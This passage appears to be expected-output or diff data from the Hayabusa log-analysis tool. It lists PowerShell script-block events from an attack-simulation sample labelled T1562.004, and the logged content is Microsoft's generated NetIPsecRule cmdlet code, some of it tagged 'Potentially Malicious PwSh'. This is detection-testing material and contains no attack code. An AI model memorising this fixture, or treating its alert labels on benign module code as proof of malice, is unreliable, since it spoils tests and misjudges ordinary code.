'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, 